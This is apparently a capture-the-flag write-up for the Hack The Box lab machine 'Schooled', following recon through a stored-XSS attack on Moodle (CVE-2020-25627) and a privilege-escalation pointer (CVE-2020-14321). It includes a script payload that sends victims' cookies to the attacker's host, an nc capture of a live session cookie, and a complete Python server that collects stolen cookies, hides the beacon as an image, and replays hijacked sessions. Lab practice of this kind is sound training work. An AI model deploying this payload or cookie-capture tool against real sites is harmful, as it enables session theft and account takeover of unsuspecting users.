$ echo "10.10.10.234 schooled.htb" | sudo tee -a /etc/hosts
$ sudo nmap -p- -T4 -A 10.10.10.234
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-15 11:16 EDT
Nmap scan report for 10.10.10.234
Host is up (0.026s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9 (FreeBSD 20200214; protocol 2.0)
| ssh-hostkey:
| 2048 1d:69:83:78:fc:91:f8:19:c8:75:a7:1e:76:45:05:dc (RSA)
| 256 e9:b2:d2:23:9d:cf:0e:63:e0:6d:b9:b1:a6:86:93:38 (ECDSA)
|_ 256 7f:51:88:f7:3c:dd:77:5e:ba:25:4d:4c:09:25:ea:1f (ED25519)
80/tcp open http Apache httpd 2.4.46 ((FreeBSD) PHP/7.4.15)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.46 (FreeBSD) PHP/7.4.15
|_http-title: Schooled - A new kind of educational institute
33060/tcp open mysqlx?
| fingerprint-strings:
| DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
| Invalid message"
| HY000
| LDAPBindReq:
| *Parse error unserializing protobuf message"
| HY000
| oracle-tns:
| Invalid message-frame."
|_ HY000
$ dirb http://10.10.10.234
---- Scanning URL: http://10.10.10.234/ ----
==> DIRECTORY: http://10.10.10.234/css/
==> DIRECTORY: http://10.10.10.234/fonts/
==> DIRECTORY: http://10.10.10.234/images/
http://10.10.10.234/index.html (CODE:200|SIZE:20750)
==> DIRECTORY: http://10.10.10.234/js/
---- Entering directory: http://10.10.10.234/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.234/fonts/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.234/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.234/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
$ nikto -h http://10.10.10.234
Server: Apache/2.4.46 (FreeBSD) PHP/7.4.15
The anti-clickjacking X-Frame-Options header is not present.
The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
No CGI Directories found (use '-C all' to force check all possible dirs)
Allowed HTTP Methods: OPTIONS, HEAD, GET, POST, TRACE
OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
OSVDB-3268: /css/: Directory indexing found.
OSVDB-3092: /css/: This might be interesting…
OSVDB-3268: /images/: Directory indexing found.
7864 requests: 0 error(s) and 8 item(s) reported on remote host
$ whatweb schooled.htb
http://schooled.htb [200 OK] Apache[2.4.46], Bootstrap, Country[RESERVED][ZZ], Email[#,admissions@schooled.htb], HTML5, HTTPServer[FreeBSD][Apache/2.4.46 (FreeBSD) PHP/7.4.15], IP[10.10.10.234], PHP[7.4.15], Script, Title[Schooled - A new kind of educational institute], X-UA-Compatible[IE=edge]
Found on the web pages:
admissions@schooled.htb
Jane Higgins - Scientific Research Lecturer
Lianne Carter - Manager & English Lecturer
Manuel Phillips - Mathematics Lecturer
Jamie Borham - Information Technology Lecturer
"All content will be delivered over Moodle."
$ gobuster -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt vhost -u http://schooled.htb -o subdomain_schooled.htb
Found: moodle.schooled.htb (Status: 200) [Size: 84]
$ ffuf -c -w /usr/share/dnsrecon/subdomains-top1mil-5000.txt -u http://schooled.htb -H "Host: FUZZ.schooled.htb" -fw 5338
moodle [Status: 200, Size: 84, Words: 5, Lines: 2]
$ echo "10.10.10.234 moodle.schooled.htb" | sudo tee -a /etc/hosts
CVE-2020-25627: the MoodleNet profile field (moodlenetprofile, Moodle 3.9.1 and earlier) is vulnerable to stored XSS. https://moodle.org/mod/forum/discuss.php?d=410839
Session hijack via the stored XSS. The payload loads an "image" from our host with the victim's document.cookie appended to the URL, so every cookie that is not HttpOnly is sent to us:
<script>new Image().src="http://10.10.14.149/bogus.php?output="+document.cookie;</script>
Paste it into the MoodleNet profile field of our own profile (Edit profile), start a listener on port 80, and wait for someone to view the profile. The captured MoodleSession cookie is all Moodle needs to identify the session.
$ nc -lnvp 80
listening on [any] 80 ...
connect to [10.10.14.149] from (UNKNOWN) [10.10.10.234] 55198
GET /bogus.php?output=MoodleSession=go8f0r3ct801atmtrd6aicpegd HTTP/1.1
Host: 10.10.14.149
User-Agent: Mozilla/5.0 (X11; FreeBSD amd64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://moodle.schooled.htb/moodle/user/profile.php?id=29
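The Referer shows the victim was viewing profile id=29 when the payload fired. As an added example (written for these notes, not code from the original writeup or from Moodle), the capture server below replaces the raw nc listener: it parses the `output=` parameter the payload appends, stores each cookie by name, logs the Referer, and answers with a 1x1 GIF so the victim's browser sees an ordinary image load. `hijack_request()` then builds a replay request carrying the captured MoodleSession cookie. The listen port, the sample request lines and the target URL http://moodle.schooled.htb/moodle/my/ are assumptions.

```python
"""Capture server for the stored-XSS session hijack (added example, not from the writeup)."""
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlsplit, unquote
import urllib.request

LISTEN_ADDR = ("0.0.0.0", 80)  # assumption: same port the payload and nc listener use
TARGET = "http://moodle.schooled.htb/moodle/my/"  # assumption: page to replay the session against

# 1x1 transparent GIF, returned so the <img> the payload creates does not error out.
PIXEL = (b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff!"
         b"\xf9\x04\x01\x00\x00\x00\x00,\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;")


def parse_exfil(request_line: str) -> dict:
    """Extract cookies from a request line such as
    'GET /bogus.php?output=MoodleSession=abc HTTP/1.1'.

    document.cookie joins cookies with '; ' and the browser percent-encodes the
    space, so the value is URL-decoded and split on ';' rather than passed to
    parse_qs (which splits on ';' only in some Python versions).
    Returns {cookie_name: value}; an unparseable line yields {}.
    """
    parts = request_line.split(" ")
    if len(parts) < 2:
        return {}
    cookies = {}
    for param in urlsplit(parts[1]).query.split("&"):
        name, sep, value = param.partition("=")
        if name != "output" or not sep:
            continue
        for pair in unquote(value).split(";"):
            ck, sep2, cv = pair.strip().partition("=")
            if sep2 and ck:
                cookies[ck] = cv
    return cookies


class CaptureHandler(BaseHTTPRequestHandler):
    captured = {}  # class-level store, shared across requests

    def do_GET(self):
        cookies = parse_exfil(self.requestline)
        if cookies:
            CaptureHandler.captured.update(cookies)
            self.log_message("cookies from %s (Referer: %s): %s",
                             self.client_address[0],
                             self.headers.get("Referer", "-"), cookies)
        self.send_response(200)
        self.send_header("Content-Type", "image/gif")
        self.send_header("Content-Length", str(len(PIXEL)))
        self.end_headers()
        self.wfile.write(PIXEL)


def hijack_request(cookies: dict, url: str = TARGET) -> urllib.request.Request:
    """Build a request that replays the victim's session cookie.

    Moodle identifies the session by the MoodleSession cookie alone, so sending
    just that cookie is enough; fetching the dashboard with it should return
    the victim's page rather than the login form.
    """
    if "MoodleSession" not in cookies:
        raise ValueError("no MoodleSession cookie captured")
    req = urllib.request.Request(url)
    req.add_header("Cookie", "MoodleSession=" + cookies["MoodleSession"])
    return req


if __name__ == "__main__":
    print("listening on %s:%d" % LISTEN_ADDR)
    HTTPServer(LISTEN_ADDR, CaptureHandler).serve_forever()
```

Run it as root (port 80) in place of nc; once `CaptureHandler.captured` holds a MoodleSession value, `urllib.request.urlopen(hijack_request(CaptureHandler.captured))` replays the session.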
Moodle privesc to manager: CVE-2020-14321 (Moodle before 3.9.1, 3.8.4, 3.7.7 and 3.5.13: a teacher of a course can assign themselves the manager role within that course).
https://github.com/HoangKien1020/CVE-2020-14321
https://vimeo.com/441698193